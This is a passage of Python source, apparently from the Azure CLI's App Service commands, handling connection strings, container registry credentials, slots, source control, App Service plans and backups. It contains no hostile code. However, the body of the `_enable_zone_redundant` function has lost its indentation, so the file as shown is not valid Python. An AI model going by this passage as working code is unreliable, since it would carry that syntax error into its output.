    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '=', connection string should not have '=' in the name
        conn_string_name, value = name_value.split('=', 1)
        # strip away the quotes used as separators; guard the empty-value case
        # ('NAME='), which previously raised IndexError on value[0]
        if value and value[0] in ["'", '"']:
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
                                                                            type=connection_string_type)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings, slot, client)
    if slot_settings:
        new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
        slot_cfg_names.connection_string_names += new_slot_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove connection strings, also dropping them from the slot-sticky list."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting in setting_names:
        conn_strings.properties.pop(setting, None)
        if slot_cfg_names.connection_string_names and setting in slot_cfg_names.connection_string_names:
            slot_cfg_names.connection_string_names.remove(setting)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings, slot, client)
# App settings that carry container (docker) configuration; used to filter
# the settings shown/deleted by the container-config commands below.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values are masked (set to None) before being returned to the user.
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update container (docker) configuration for a web app or slot.

    Writes the DOCKER_* app settings, applies the container image as the fx
    version, and optionally applies a multicontainer config file. Returns the
    container-related app settings with credentials masked.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    # for an ACR registry given without credentials, try to resolve the admin
    # credentials from the subscription (best effort; failure only warns)
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # registry name is the first DNS label, whether or not a scheme was given
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex:  # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex)  # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage:  # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
    # re-read so the returned view reflects what the service actually stored
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
    # multicontainer file and type are required together; a lone flag only warns
    if multicontainer_config_file and multicontainer_config_type:
        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant of container-settings update (no storage toggle, no multicontainer)."""
    return update_container_settings(cmd, resource_group_name, name,
                                     docker_registry_server_url=docker_registry_server_url,
                                     docker_custom_image_name=docker_custom_image_name,
                                     docker_registry_server_user=docker_registry_server_user,
                                     websites_enable_app_service_storage=None,
                                     docker_registry_server_password=docker_registry_server_password,
                                     multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up admin credentials for an Azure Container Registry by name.

    Returns (username, password). Raises CLIError when the registry cannot be
    uniquely identified or its admin user is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    resources = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    # BUG FIX: compare case-insensitively on BOTH sides — registry_name comes
    # from a user-supplied URL and may contain uppercase, while ARM preserves
    # the resource's original casing; the original only lowered the left side.
    matches = [item for item in resources if item.name.lower() == registry_name.lower()]
    if not matches or len(matches) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(matches[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Clear container configuration: reset the fx version and delete the DOCKER_* app settings."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Show container-related app settings, credentials masked; optionally decode multicontainer config."""
    current = get_app_settings(cmd, resource_group_name, name, slot)
    filtered = _filter_for_container_settings(cmd, resource_group_name, name, current,
                                              show_multicontainer_config, slot)
    return _mask_creds_related_appsettings(filtered)
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Function-app variant of show_container_settings (never decodes multicontainer config)."""
    return show_container_settings(cmd, resource_group_name, name,
                                   show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Keep only container-related settings, adding the fx version as a synthetic entry."""
    container_settings = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        container_settings.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                                   'value': fx_version})
        if show_multicontainer_config:
            decoded = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            container_settings.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                                       'value': decoded})
    return container_settings
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Null out credential-bearing entries (APPSETTINGS_TO_MASK) in *settings*, in place."""
    sensitive_keys = [key for key in settings if key in APPSETTINGS_TO_MASK]
    for key in sensitive_keys:
        settings[key] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind *hostname* to a web app or slot."""
    from azure.mgmt.web.models import HostNameBinding
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(site_name=webapp.name)
    if slot is None:
        return client.web_apps.create_or_update_host_name_binding(
            resource_group_name=resource_group_name, name=webapp.name,
            host_name=hostname, host_name_binding=binding)
    return client.web_apps.create_or_update_host_name_binding_slot(
        resource_group_name=resource_group_name, name=webapp.name,
        host_name=hostname, slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Remove a host-name binding from a web app or slot."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
    return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List host-name bindings, trimming each name to the bare hostname."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        # binding names come back as 'site/hostname'; expose just the hostname
        binding.name = binding.name.split('/')[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Resolve the inbound IP address of a web app (logic ported from the portal)."""
    SslState = cmd.get_models('SslState')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if not webapp.hosting_environment_profile:
        # multi-tenant app: resolve its default hostname via DNS
        return {'ip': _resolve_hostname_through_dns(webapp.default_host_name)}
    # App Service Environment: prefer the ILB address, then an IP-SSL VIP,
    # falling back to the ASE's shared service IP
    address = client.app_service_environments.list_vips(
        resource_group_name, webapp.hosting_environment_profile.name)
    if address.internal_ip_address:
        return {'ip': address.internal_ip_address}
    vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
    return {'ip': vip.virtual_ip if vip else address.service_ip_address}
def _resolve_hostname_through_dns(hostname):
    """Resolve *hostname* to an IPv4 address via the system resolver."""
    import socket
    resolved = socket.gethostbyname(hostname)
    return resolved
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot for a web app, optionally cloning configuration.

    configuration_source names the slot to clone from; when it equals the app
    name itself, production is cloned. Function apps are rejected.
    """
    Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    site_config = get_site_configs(cmd, resource_group_name, webapp, None)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    if 'functionapp' in site.kind:
        raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    slot_def.site_config = SiteConfig()
    # if it is a Windows Container site, at least pass the necessary
    # app settings to perform the container image validation:
    if configuration_source and site_config.windows_fx_version:
        # get settings from the source
        clone_from_prod = configuration_source.lower() == webapp.lower()
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings', src_slot)
        settings = []
        for k, v in app_settings.properties.items():
            if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
                     "DOCKER_REGISTRY_SERVER_URL"):
                settings.append(NameValuePair(name=k, value=v))
        slot_def.site_config = SiteConfig(app_settings=settings)
    poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    # the full clone (config + settings + connection strings) happens after creation
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
    # result.name comes back as 'site/slot'; expose just the slot's short name
    result.name = result.name.split('/')[-1]
    return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
    """Create a deployment slot for a function app, optionally cloning configuration."""
    Site = cmd.get_models('Site')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' function app doesn't exist".format(name))
    slot_def = Site(server_farm_id=site.server_farm_id, location=site.location)
    poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name,
                                                         site_envelope=slot_def, slot=slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot,
                                              configuration_source)
    # expose just the slot's short name, not 'site/slot'
    result.name = result.name.split('/')[-1]
    return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
    """Clone site config, app settings and connection strings into *slot*.

    The source is *configuration_source* (production when it equals the app
    name). Values marked slot-sticky are excluded so they don't propagate.
    """
    clone_from_prod = configuration_source.lower() == webapp.lower()
    site_config = get_site_configs(cmd, resource_group_name, webapp,
                                   None if clone_from_prod else configuration_source)
    _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                            'update_configuration', slot, site_config)
    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
    src_slot = None if clone_from_prod else configuration_source
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                           'list_application_settings',
                                           src_slot)
    for a in slot_cfg_names.app_setting_names or []:
        app_settings.properties.pop(a, None)
    connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                 'list_connection_strings',
                                                 src_slot)
    for a in slot_cfg_names.connection_string_names or []:
        connection_strings.properties.pop(a, None)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_application_settings',
                                app_settings, slot, client)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_connection_strings',
                                connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None,  # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, github_action=None):
    """Configure deployment source control (git/mercurial/GitHub Actions) for a site.

    A provided git_token is cached service-side first; the source-control
    binding is then applied with retries for transient 50x failures.
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    from azure.mgmt.web.models import SiteSourceControl, SourceControl
    if git_token:
        sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
        client.update_source_control('GitHub', sc)
    source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
    # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
    for i in range(5):
        try:
            poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                             'begin_create_or_update_source_control',
                                             slot, source_control)
            return LongRunningOperation(cmd.cli_ctx)(poller)
        except Exception as ex:  # pylint: disable=broad-except
            import re
            # normalize the exception without raising, so its text can be inspected
            ex = ex_handler_factory(no_throw=True)(ex)
            # for non server errors(50x), just throw; otherwise retry 4 times
            if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                raise
            logger.warning('retrying %s/4', i + 1)
            time.sleep(5)  # retry in a moment
def update_git_token(cmd, git_token=None):
    """Update the GitHub source-control token cached in Azure App Service.

    When no token is given, the existing cached token is cleared.
    """
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory(cmd.cli_ctx)
    source_control = SourceControl(name='not-really-needed', source_control_name='GitHub',
                                   token=git_token or '')
    return client.update_source_control('GitHub', source_control)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Show the source-control configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Remove the source-control configuration from a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Switch the app's SCM type to LocalGit and return the git clone URL."""
    client = web_client_factory(cmd.cli_ctx)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    config.scm_type = 'LocalGit'
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                            'create_or_update_configuration', slot, config)
    local_git_url = _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)
    return {'url': local_git_url}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a repository sync for the app (or slot)."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'sync_repository', slot)
    except CloudError as ex:  # Because of bad spec, sdk throws on 200. We capture it here
        if ex.status_code not in (200, 204):
            raise ex
def list_app_service_plans(cmd, resource_group_name=None):
    """List App Service plans, subscription-wide or within one resource group."""
    client = web_client_factory(cmd.cli_ctx)
    if resource_group_name is not None:
        plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
    else:
        plans = list(client.app_service_plans.list(detailed=True))  # enables querying "numberOfSites"
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
                            app_service_environment=None, sku='B1', number_of_workers=None, location=None,
                            tags=None, no_wait=False, zone_redundant=False):
    """Create an App Service plan, optionally inside an App Service Environment.

    Resolves the ASE by name or resource id (plans must share its location),
    otherwise derives the location from the resource group, then submits the
    plan create/update, optionally without waiting on the LRO.

    Raises:
        ArgumentUsageError: Windows containers requested inside an ASE.
        ResourceNotFoundError: the named ASE is not in the subscription.
        ValidationError: an existing non-logic-app plan would be converted to a WS* SKU.
    """
    HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
        'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
    client = web_client_factory(cmd.cli_ctx)
    if app_service_environment:
        if hyper_v:
            raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
        # match the ASE by name or by full resource id, case-insensitively
        ase_list = client.app_service_environments.list()
        ase_found = False
        ase = None
        for ase in ase_list:
            if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
                ase_def = HostingEnvironmentProfile(id=ase.id)
                location = ase.location  # plans must be co-located with their ASE
                ase_found = True
                break
        if not ase_found:
            err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
            raise ResourceNotFoundError(err_msg)
    else:  # Non-ASE
        ase_def = None
        if location is None:
            location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
                              per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
    if sku.upper() in ['WS1', 'WS2', 'WS3']:
        existing_plan = get_resource_if_exists(client.app_service_plans,
                                               resource_group_name=resource_group_name, name=name)
        if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
            # fix: the message previously contained bare '{}' placeholders — fill them in
            raise ValidationError("Plan {} in resource group {} already exists and "
                                  "cannot be updated to a logic app SKU (WS1, WS2, or WS3)"
                                  .format(name, resource_group_name))
        plan_def.type = "elastic"
    if zone_redundant:
        _enable_zone_redundant(plan_def, sku_def, number_of_workers)
    return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
                            max_elastic_worker_count=None):
    """Apply SKU / worker-count / elastic-scale changes to a fetched plan and return it.

    Generic-update pattern: `instance` is the plan object fetched by the CLI
    framework; the mutated object returned here is PUT back by the caller.
    """
    # Nothing requested: warn, but still return the (unchanged) instance.
    if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
        args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
        logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
    sku_def = instance.sku
    if sku is not None:
        sku = _normalize_sku(sku)
        sku_def.tier = get_sku_tier(sku)
        sku_def.name = sku
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    else:
        # keep the effective capacity around for the max-elastic-worker-count check below
        number_of_workers = sku_def.capacity
    if elastic_scale is not None or max_elastic_worker_count is not None:
        if sku is None:
            sku = instance.sku.name
        # elastic-scale settings are only valid on Premium V2/V3 plans
        if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
            raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
                                  "Use command help to see all available SKUs")
    if elastic_scale is not None:
        # TODO use instance.elastic_scale_enabled once the ASP client factories are updated
        use_additional_properties(instance)
        instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
    if max_elastic_worker_count is not None:
        instance.maximum_elastic_worker_count = max_elastic_worker_count
        if max_elastic_worker_count < number_of_workers:
            raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
                                            "plan's number of workers. To update the plan's number of workers, use "
                                            "--number-of-workers ")
        # TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
        use_additional_properties(instance)
        instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
    instance.sku = sku_def
    return instance
def show_plan(cmd, resource_group_name, name):
    """Fetch an App Service plan via a raw ARM GET (exposes fields the SDK model hides)."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    client = web_client_factory(cmd.cli_ctx)
    serverfarm_url = (
        'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
        .format(get_subscription_id(cmd.cli_ctx), resource_group_name, name,
                client.DEFAULT_API_VERSION))
    request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
    return send_raw_request(cmd.cli_ctx, "GET", request_url).json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update a function-app plan; --max-burst is only valid on Elastic Premium plans."""
    instance = update_app_service_plan(instance, sku, number_of_workers)
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        instance.maximum_elastic_worker_count = validate_range_of_int_flag(
            '--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag(
            '--number-of-workers / --min-instances', number_of_workers, min_val=0, max_val=20)
    return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Return the webapp's backup schedule, or fail with a clear CLI error."""
    try:
        config = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                         'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')
    return config
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List all backups of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                   'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup of a webapp (or slot) into the given storage container."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]  # service appends .zip itself
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type,
                                    db_connection_string=db_connection_string)
    request = BackupRequest(backup_name=backup_name,
                            storage_account_url=storage_account_url, databases=db_setting)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the app's scheduled-backup configuration.

    Arguments left as None fall back to the currently configured schedule; when
    no schedule exists yet, all of --container-url/--frequency/--retention/
    --retain-one must be supplied.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    # the service appends .zip itself, so strip a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        # default name: <app>_<UTC timestamp to the minute>
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        # No configuration set yet
        # NOTE: when all required args are present we continue with configuration=None;
        # every later access is guarded by an explicit-argument check or `if configuration`.
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # CLI passes this flag as a string; normalize to bool
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    # inherit database settings from the existing configuration when not overridden
    if configuration and configuration.databases:
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a webapp (or slot) from a backup blob in the given storage account."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    # blobs are stored with a .zip extension; add it when missing
    blob_name = backup_name if backup_name.lower().endswith('.zip') else backup_name + '.zip'
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type,
                                    db_connection_string=db_connection_string)
    restore_request = RestoreRequest(storage_account_url=storage_account_url,
                                     blob_name=blob_name, overwrite=overwrite,
                                     site_name=target_name, databases=db_setting,
                                     ignore_conflicting_host_names=ignore_hostname_conflict)
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List restorable snapshots for a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots', slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore a webapp from a snapshot — either its own or another app's."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    has_source = bool(source_resource_group and source_name)
    if has_source:
        # Restore from source app to target app
        source_id = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/sites/{}".format(
            get_subscription_id(cmd.cli_ctx), source_resource_group, source_name)
        if source_slot:
            source_id += "/slots/" + source_slot
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time,
                                         recovery_source=SnapshotRecoverySource(id=source_id),
